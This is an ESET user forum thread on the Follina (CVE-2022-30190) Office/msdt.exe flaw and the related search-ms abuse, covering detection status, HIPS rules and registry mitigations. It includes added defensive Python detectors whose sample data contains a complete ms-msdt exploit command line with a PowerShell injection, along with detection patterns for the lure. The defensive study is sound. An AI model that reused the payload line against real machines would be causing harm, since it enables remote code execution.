jinlei801011 Posted June 1, 2022
Recently CVE-2022-30190 was disclosed by Microsoft (https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/) and is detected by Microsoft Defender. Will my customers' ESET Endpoint detect this? I cannot find any info on it.
Camilo Diaz Posted June 1, 2022
TStowy65 Posted June 1, 2022
I just chatted with ESET support and got the agent's permission to add this.

Date: 2022-06-01 12:32:55 PDT, To: Everyone, From: Wyatt P.
Can confirm we detect it as Win32/Exploit.CVE-2022-30190 trojan.

Date: 2022-06-01 12:33:21 PDT, To: Everyone, From: Wyatt P.
These are the Microsoft recommendations: https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

Date: 2022-06-01 12:33:28 PDT, To: Everyone, From: Wyatt P.
No patch from MS available at this moment.
itman Posted June 1, 2022
13 minutes ago, TStowy65 said: These are the Microsoft recommendations https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

That is not enough to fully mitigate this vulnerability. See my posting here: https://forum.eset.com/topic/32571-ms-word-follina-exploit-not-detected/?do=findComment&comment=151719
itman Posted June 1, 2022 (edited)
I will note that for anyone using Eset recommended anti-ransomware HIPS rules, this attack can be mitigated by adding C:\Windows\System32\msdt.exe -EDIT- and C:\Windows\SysWOW64\msdt.exe to the list of specific startup applications for the rule named "Deny child processes from Office 20xx processes."

Ref.: https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug
Edited June 2, 2022 by itman
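The HIPS rule above denies one specific parent/child pair: an Office process starting msdt.exe. The following is an added example, not ESET, Huntress or thread code, showing what that condition looks like in process-creation telemetry and where it falls short: it walks constructed Sysmon-style Event ID 1 records (field names ParentImage, Image, CommandLine), flags msdt.exe, from either the System32 or the SysWOW64 copy, when its parent is an Office binary, and separately flags the ms-msdt lure by command-line content so that a launch with a non-Office parent (an RTF rendered in the Explorer preview pane, which comes up later in this thread, has explorer.exe as the parent) is still caught. The Office process list and the command-line fragments (ms-msdt:, IT_BrowseForFile=, $( ) are assumptions taken from public write-ups, not from this thread; the sample events and paths are constructed.

```python
"""Process-creation triage for the msdt.exe abuse discussed above.
Added example over constructed Sysmon-style events; not ESET or Huntress code."""
import json
import re

# Office parents the HIPS rule "Deny child processes from Office 20xx processes"
# is keyed on (assumed list; extend to whatever Office binaries you deploy).
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                 "msaccess.exe", "mspub.exe"}
# Both copies matter: 32-bit Office on 64-bit Windows launches the SysWOW64 one.
MSDT_IMAGES = {r"c:\windows\system32\msdt.exe", r"c:\windows\syswow64\msdt.exe"}
# Command-line fragments of the ms-msdt lure (assumed from public write-ups).
MSDT_ABUSE_RE = re.compile(r"ms-msdt:|IT_(Re)?BrowseForFile=|\$\(", re.IGNORECASE)


def image_name(path: str) -> str:
    """Last path component, lower-cased, so vendor install paths don't matter."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the reasons an event is suspicious; an empty list means benign."""
    reasons = []
    if event.get("Image", "").lower() not in MSDT_IMAGES:
        return reasons
    if image_name(event.get("ParentImage", "")) in OFFICE_IMAGES:
        reasons.append("msdt-child-of-office")      # exactly what the HIPS rule denies
    if MSDT_ABUSE_RE.search(event.get("CommandLine", "")):
        reasons.append("msdt-follina-cmdline")      # fires whatever the parent is
    return reasons


def scan_log(lines) -> list[tuple[int, list[str]]]:
    """Scan JSON-lines events; keep only those with at least one reason."""
    hits = []
    for i, line in enumerate(lines):
        reasons = classify(json.loads(line))
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed events (Sysmon Event ID 1 field names; paths and payloads are samples).
EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\msdt.exe",
     "CommandLine": r'''C:\Windows\System32\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_BrowseForFile=h$(Invoke-Expression('calc'))i/../../../../Windows/System32/mpsigstub.exe"'''},
    {"ParentImage": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\SysWOW64\msdt.exe",           # 32-bit Office on 64-bit Windows
     "CommandLine": r'"C:\Windows\SysWOW64\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_BrowseForFile=h"'},
    {"ParentImage": r"C:\Windows\explorer.exe",          # RTF rendered in the preview pane
     "Image": r"C:\Windows\System32\msdt.exe",
     "CommandLine": r'msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c"'},
    {"ParentImage": r"C:\Windows\System32\control.exe",  # a user running a real troubleshooter
     "Image": r"C:\Windows\System32\msdt.exe",
     "CommandLine": r"C:\Windows\System32\msdt.exe -id NetworkDiagnosticsWeb"},
]
LOG = [json.dumps(e) for e in EVENTS]

if __name__ == "__main__":
    for idx, why in scan_log(LOG):
        print(idx, image_name(EVENTS[idx]["ParentImage"]), "->", EVENTS[idx]["Image"], why)
```

The third event is the one to note: the parent-based rule never sees it, only the command-line check does, so a HIPS rule on Office parents is a partial control and should be paired with either the protocol-handler removal or a detection that keys on msdt.exe arguments.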
czesetfan Posted June 2, 2022
4 hours ago, itman said: I will note that for anyone using Eset recommended anti-ransomware HIPS rules, this attack can be mitigated by adding C:\Windows\System32\msdt.exe to the list of specific startup applications for the rule named "Deny child processes from Office 20xx processes." Ref.: https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug

And does it also apply to C:\Windows\SysWOW64\msdt.exe?
schuetzdentalCB Posted June 2, 2022
Quote: And does it also apply to C:\Windows\SysWOW64\msdt.exe?

If you type in both paths of msdt, of course ^^
itman Posted June 2, 2022 (edited)
8 hours ago, czesetfan said: And does it also apply to C:\Windows\SysWOW64\msdt.exe?

If you are running a 32-bit version of MS Office, then the answer is yes. Also possibly if you are running a 32-bit version of Windows. Adding both System32 and SysWOW64 versions might be a good idea.
Edited June 2, 2022 by itman
itman Posted June 2, 2022 (edited)
BTW - this ms-msdt use isn't the only exploit that currently exists in MS Office:

Quote:
This was seen yesterday when Hickey converted existing Microsoft Word MSDT exploits to use the search-ms protocol handler we described earlier. With this new PoC, when a user opens a Word document, it will automatically launch a 'search-ms' command to open a Windows Search window that lists executables on a remote SMB share. This share can be named whatever the threat actor wants, such as 'Critical Updates,' prompting the users to install the listed malware.

"Microsoft Office search-ms: URI handler exploitation, requires user-interaction. Unpatched." — hackerfantastic.crypto (@hackerfantastic) June 1, 2022

Like the MSDT exploits, Hickey also showed that you could create RTF versions that automatically open a Windows Search window when the document is rendered in the Explorer preview pane.

"Here is the same search-ms attack being leveraged through an RTF document when Windows Preview Pane is enabled... 😉" — hackerfantastic.crypto (@hackerfantastic) June 1, 2022

By using this type of malicious Word document, threat actors can create elaborate phishing campaigns that automatically launch Windows Search windows on recipients' devices to trick them into launching malware. While this exploit is not as severe as the MS-MSDT remote code execution vulnerability, it could lead to abuse by industrious threat actors who want to create sophisticated phishing campaigns. Although we've already found ways threat actors could exploit this new flaw in the wild, we're not going to share this information for obvious reasons.

To mitigate this vulnerability, Hickey says you can use the same mitigation for ms-msdt exploits - delete the search-ms protocol handler from the Windows Registry.
Run Command Prompt as Administrator.
To back up the registry key, execute the command "reg export HKEY_CLASSES_ROOT\search-ms search-ms.reg"
Execute the command "reg delete HKEY_CLASSES_ROOT\search-ms /f"

https://www.bleepingcomputer.com/news/security/new-windows-search-zero-day-added-to-microsoft-protocol-nightmare/

This leads me to believe that it might be advisable to take the Microsoft Defender ASLR rule approach in regards to MS Office executables and block all child process startup from them. Of course, this might bork something legit.
Edited June 2, 2022 by itman
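The post above describes two document-borne vectors: a Word file whose OLE object points at a remote HTML page that redirects to ms-msdt:, and Word or RTF files that fire a search-ms: URI, including from the Explorer preview pane. Deleting the protocol handlers is the endpoint-side fix; the added example below (not code from the thread, ESET or BleepingComputer) is the mail-gateway or triage side: a static scanner that opens a .docx as the zip package it is, reports any relationship in a .rels part that is an oleObject with TargetMode="External" (the remote-template trick; ordinary external hyperlinks are deliberately not flagged), and greps every part, and raw RTF, for ms-msdt: or search-ms: URIs. The RTF control words \objautlink and \objupdate, which make Word refresh a linked object when the file is rendered, are an assumption from public Follina write-ups, not something this thread states. The sample documents, the placeholder URL and the share path are constructed in the block.

```python
"""Static triage of Office documents for the ms-msdt / search-ms lures
discussed above. Added example; the sample documents are constructed inline."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

# Protocol handlers the thread discusses as abused from Office documents.
SCHEME_RE = re.compile(rb"\b(ms-msdt|search-ms):", re.IGNORECASE)
# RTF control words that make Word load/refresh an OLE link when the file is
# rendered (assumed from public Follina write-ups, not stated in this thread).
RTF_OLE_MARKERS = (rb"\objautlink", rb"\objupdate")


def scan_docx(data: bytes) -> list[str]:
    """Return findings for an OOXML (.docx) package held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            blob = pkg.read(name)
            for m in SCHEME_RE.finditer(blob):
                findings.append(f"{name}: protocol handler URI {m.group(1).decode()}:")
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(blob)
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                # An OLE object whose target lives outside the package is the
                # Follina hallmark: Word fetches the remote HTML on open.
                # Hyperlinks are also External and are deliberately NOT flagged.
                if rel.get("TargetMode") == "External" and rel.get("Type") == OLE_REL:
                    findings.append(f"{name}: external OLE object -> {rel.get('Target')}")
    return findings


def scan_rtf(data: bytes) -> list[str]:
    """Return findings for a raw RTF file (the preview-pane variant)."""
    findings = [f"rtf: protocol handler URI {m.group(1).decode()}:"
                for m in SCHEME_RE.finditer(data)]
    if b"\\object" in data and any(mk in data for mk in RTF_OLE_MARKERS):
        findings.append("rtf: OLE link object set to auto-update on render")
    return findings


def scan(data: bytes) -> list[str]:
    """Dispatch on magic bytes; anything else is out of scope and returns []."""
    if data.startswith(b"PK\x03\x04"):
        return scan_docx(data)
    if data.startswith(b"{\\rtf"):
        return scan_rtf(data)
    return []


def build_docx(rels_xml: str) -> bytes:
    """Constructed minimal package holding only the parts the scanner inspects."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("word/document.xml",
                     '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        pkg.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed samples (the URL and share are placeholders, not real indicators).
FOLLINA_DOCX = build_docx(
    f'<Relationships xmlns="{RELS_NS}">'
    f'<Relationship Id="rId5" Type="{OLE_REL}" '
    'Target="http://payload.example.invalid/lure.html!" TargetMode="External"/>'
    '</Relationships>')
BENIGN_DOCX = build_docx(
    f'<Relationships xmlns="{RELS_NS}">'
    '<Relationship Id="rId2" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
    'Target="https://www.eset.com/" TargetMode="External"/>'
    '</Relationships>')
SEARCHMS_RTF = (rb"{\rtf1{\object\objautlink\objupdate{\*\objdata 0105}}"
                rb"search-ms:displayname=Critical%20Updates&crumb=location:\\srv\share}")

if __name__ == "__main__":
    for label, doc in (("follina.docx", FOLLINA_DOCX), ("benign.docx", BENIGN_DOCX),
                       ("lure.rtf", SEARCHMS_RTF)):
        print(label, scan(doc) or "clean")
```

Two points of design: the .rels check is the reliable one for the ms-msdt variant because the document itself never contains the URI (only the remote HTML does), so a string grep alone misses it; and the scanner treats a hit as a triage signal, not a verdict, since external OLE links have legitimate uses.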
Trooper (ESET Insiders) Posted June 8, 2022
On 6/1/2022 at 7:19 PM, itman said: I will note that for anyone using Eset recommended anti-ransomware HIPS rules, this attack can be mitigated by adding C:\Windows\System32\msdt.exe -EDIT- and C:\Windows\SysWOW64\msdt.exe to the list of specific startup applications for the rule named "Deny child processes from Office 20xx processes." Ref.: https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug

Thanks for this @itman, is there anything else that I can do with ESET to block this? I have done the MS registry key already at work. Cheers.
itman Posted June 8, 2022 (edited)
13 hours ago, Trooper said: Thanks for this @itman, is there anything else that I can do with ESET to block this? I have done the MS registry key already at work.

Based on my testing of recent Follina malware samples, Eset has you covered in regards to this specific msdt.exe exploit. All samples were detected upon download; either by signature detection of payload or via Eset exploit protection by CVE. However, there's another exploit technique that has been discovered that I posted about over at wilderssecurity.com and described here: https://www.bleepingcomputer.com/news/security/new-dogwalk-windows-zero-day-bug-gets-free-unofficial-patches/ . This one appears to be a Microsoft Defender bypass since opening of the malware dropper, a .cab file, bypassed Mark-of-the-Web checking. Until shown otherwise, I would say Eset should cover this one also.

-EDIT- Looks like Eset has issues with Qbot malware deployment of Follina exploit: https://forum.eset.com/topic/32642-eset-not-detecting-qbot-deploying-follina-exploit/
Edited June 8, 2022 by itman
Trooper (ESET Insiders) Posted June 8, 2022
6 hours ago, itman said: Based on my testing of recent Follina malware samples, Eset has you covered in regards to this specific msdt.exe exploit. All samples were detected upon download; either by signature detection of payload or via Eset exploit protection by CVE. However, there's another exploit technique that has been discovered that I posted about over at wilderssecurity.com and described here: https://www.bleepingcomputer.com/news/security/new-dogwalk-windows-zero-day-bug-gets-free-unofficial-patches/ . This one appears to be a Microsoft Defender bypass since opening of the malware dropper, a .cab file, bypassed Mark-of-the-Web checking. Until shown otherwise, I would say Eset should cover this one also. -EDIT- Looks like Eset has issues with Qbot malware deployment of Follina exploit: https://forum.eset.com/topic/32642-eset-not-detecting-qbot-deploying-follina-exploit/

Thank you for your reply. Looks like ESET has now addressed the Qbot malware deployment as well. Cheers.